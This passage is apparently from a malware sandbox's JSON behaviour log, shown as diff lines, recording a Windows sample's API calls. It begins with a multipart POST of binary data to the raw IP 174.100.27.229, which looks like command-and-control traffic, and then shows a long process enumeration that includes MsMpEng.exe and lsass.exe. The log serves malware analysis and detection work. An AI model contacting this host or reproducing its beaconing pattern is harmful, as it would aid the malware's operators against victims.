false, + "return": "0x00000000", + "arguments": [ + { + "name": "RequestHandle", + "value": "0x00cc000c" + }, + { + "name": "Headers", + "value": "Referer: http://174.100.27.229/0QpXNAhfFF/lZOxY3vCMhmmxYVL2WX/2FY1XaTSPr84bq/\r\nContent-Type: multipart/form-data; boundary=---------------------------810451373316123\r\n" + }, + { + "name": "PostData", + "value": "\r\n-----------------------------810451373316123\r\nContent-Disposition: form-data; name=\"SEDzBrkJyzJVHK\"; filename=\"FBFXlndMdOJjH\"\r\nContent-Type: application/octet-stream\r\n\r\n[\\x0f\\xd6\\xc0iv\\xe4\\x83\\xf2\\x9d\\xa0&R\\x7f-:\\xa5\\x88\\x00\\xdc\\xb1@\\xa2\\x0c\\xc3W@\\xb7\\xc6\\xb9\\xd1\\x0fZ\\xe4\\xd9\\x99\\xf9\\x11\\xee\\xae\\x1aO>\\xcf\\xeb\\xc7F\\xfa#\\x06\\x93,\\x87\\xb78\\xe0Cb\\x950\\xdb\\xf4\\x83\\x16\\x86\\xd7\\x8e\\xb0\\xf5\\xca\\xfa\\x1e\\xd8\\xb6\\xbc\\xd2a1\\x8cL\\xfcY\\xc7\\xe8\\xcc" + } + ], + "repeated": 0, + "id": 1274 + }, + { + "timestamp": "2025-03-07 22:33:47,485", + "thread_id": "9440", + "caller": "0x03ce221c", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 5, + "id": 1275 + }, + { + "timestamp": "2025-03-07 22:33:47,485", + "thread_id": "9440", + "caller": "0x03ce221c", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetCloseHandle", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc000c" + } + ], + "repeated": 0, + "id": 1276 + }, + { + "timestamp": "2025-03-07 22:33:47,485", + "thread_id": "9440", + "caller": "0x03ce227a", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetCloseHandle", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0008" + } + ], + "repeated": 0, + "id": 1277 + }, + { + "timestamp": "2025-03-07 22:33:47,485", + "thread_id": "9440", + "caller": "0x03ce23c3", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetCloseHandle", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0004" + } + ], + "repeated": 0, + "id": 1278 + }, + { + "timestamp": "2025-03-07 22:33:47,485", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1279 + }, + { + "timestamp": "2025-03-07 22:33:47,485", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "166" + } + ], + "repeated": 0, + "id": 1280 + }, + { + "timestamp": "2025-03-07 22:33:48,000", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1281 + }, + { + "timestamp": "2025-03-07 22:33:48,000", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "205" + } + ], + "repeated": 0, + "id": 1282 + }, + { + "timestamp": "2025-03-07 22:33:48,313", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1283 + }, + { + "timestamp": "2025-03-07 22:33:48,313", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "194" + } + ], + "repeated": 0, + "id": 1284 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce36cc", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "CreateToolhelp32Snapshot", + "status": true, + "return": "0x0000046c", + "arguments": [ + { + "name": "Flags", + "value": "0x00000002", + "pretty_value": "TH32CS_SNAPPROCESS" + }, + { + "name": "ProcessId", + "value": "0" + } + ], + "repeated": 0, + "id": 1285 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32FirstW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "[System Process]" + }, + { + "name": "ProcessId", + "value": "0" + } + ], + "repeated": 0, + "id": 1286 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "System" + }, + { + "name": "ProcessId", + "value": "4" + } + ], + "repeated": 0, + "id": 1287 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "Registry" + }, + { + "name": "ProcessId", + "value": "92" + } + ], + "repeated": 0, + "id": 1288 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "smss.exe" + }, + { + "name": "ProcessId", + "value": "328" + } + ], + "repeated": 0, + "id": 1289 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "csrss.exe" + }, + { + "name": "ProcessId", + "value": "428" + } + ], + "repeated": 0, + "id": 1290 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "wininit.exe" + }, + { + "name": "ProcessId", + "value": "504" + } + ], + "repeated": 0, + "id": 1291 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "csrss.exe" + }, + { + "name": "ProcessId", + "value": "516" + } + ], + "repeated": 0, + "id": 1292 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "winlogon.exe" + }, + { + "name": "ProcessId", + "value": "600" + } + ], + "repeated": 0, + "id": 1293 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "services.exe" + }, + { + "name": "ProcessId", + "value": "640" + } + ], + "repeated": 0, + "id": 1294 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "lsass.exe" + }, + { + "name": "ProcessId", + "value": "660" + } + ], + "repeated": 0, + "id": 1295 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "fontdrvhost.exe" + }, + { + "name": "ProcessId", + "value": "752" + } + ], + "repeated": 0, + "id": 1296 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "fontdrvhost.exe" + }, + { + "name": "ProcessId", + "value": "760" + } + ], + "repeated": 0, + "id": 1297 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "768" + } + ], + "repeated": 0, + "id": 1298 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "880" + } + ], + "repeated": 0, + "id": 1299 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "932" + } + ], + "repeated": 0, + "id": 1300 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "dwm.exe" + }, + { + "name": "ProcessId", + "value": "1004" + } + ], + "repeated": 0, + "id": 1301 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "520" + } + ], + "repeated": 0, + "id": 1302 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "696" + } + ], + "repeated": 0, + "id": 1303 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "844" + } + ], + "repeated": 0, + "id": 1304 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1100" + } + ], + "repeated": 0, + "id": 1305 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1120" + } + ], + "repeated": 0, + "id": 1306 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1140" + } + ], + "repeated": 0, + "id": 1307 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1152" + } + ], + "repeated": 0, + "id": 1308 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1172" + } + ], + "repeated": 0, + "id": 1309 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1224" + } + ], + "repeated": 0, + "id": 1310 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1328" + } + ], + "repeated": 0, + "id": 1311 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1392" + } + ], + "repeated": 0, + "id": 1312 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1400" + } + ], + "repeated": 0, + "id": 1313 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1492" + } + ], + "repeated": 0, + "id": 1314 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1604" + } + ], + "repeated": 0, + "id": 1315 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1612" + } + ], + "repeated": 0, + "id": 1316 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1636" + } + ], + "repeated": 0, + "id": 1317 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "Memory Compression" + }, + { + "name": "ProcessId", + "value": "1700" + } + ], + "repeated": 0, + "id": 1318 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1712" + } + ], + "repeated": 0, + "id": 1319 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1736" + } + ], + "repeated": 0, + "id": 1320 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1776" + } + ], + "repeated": 0, + "id": 1321 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1784" + } + ], + "repeated": 0, + "id": 1322 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1864" + } + ], + "repeated": 0, + "id": 1323 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1940" + } + ], + "repeated": 0, + "id": 1324 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1988" + } + ], + "repeated": 0, + "id": 1325 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2020" + } + ], + "repeated": 0, + "id": 1326 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2040" + } + ], + "repeated": 0, + "id": 1327 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "1044" + } + ], + "repeated": 0, + "id": 1328 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2084" + } + ], + "repeated": 0, + "id": 1329 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2132" + } + ], + "repeated": 0, + "id": 1330 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "spoolsv.exe" + }, + { + "name": "ProcessId", + "value": "2208" + } + ], + "repeated": 0, + "id": 1331 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2260" + } + ], + "repeated": 0, + "id": 1332 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2320" + } + ], + "repeated": 0, + "id": 1333 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2432" + } + ], + "repeated": 0, + "id": 1334 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2468" + } + ], + "repeated": 0, + "id": 1335 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2512" + } + ], + "repeated": 0, + "id": 1336 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2544" + } + ], + "repeated": 0, + "id": 1337 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2564" + } + ], + "repeated": 0, + "id": 1338 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2580" + } + ], + "repeated": 0, + "id": 1339 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2608" + } + ], + "repeated": 0, + "id": 1340 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2732" + } + ], + "repeated": 0, + "id": 1341 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2756" + } + ], + "repeated": 0, + "id": 1342 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2772" + } + ], + "repeated": 0, + "id": 1343 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MsMpEng.exe" + }, + { + "name": "ProcessId", + "value": "2780" + } + ], + "repeated": 0, + "id": 1344 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "2892" + } + ], + "repeated": 0, + "id": 1345 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3004" + } + ], + "repeated": 0, + "id": 1346 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3216" + } + ], + "repeated": 0, + "id": 1347 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3544" + } + ], + "repeated": 0, + "id": 1348 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "sihost.exe" + }, + { + "name": "ProcessId", + "value": "3724" + } + ], + "repeated": 0, + "id": 1349 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3740" + } + ], + "repeated": 0, + "id": 1350 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3768" + } + ], + "repeated": 0, + "id": 1351 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "taskhostw.exe" + }, + { + "name": "ProcessId", + "value": "3868" + } + ], + "repeated": 0, + "id": 1352 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + 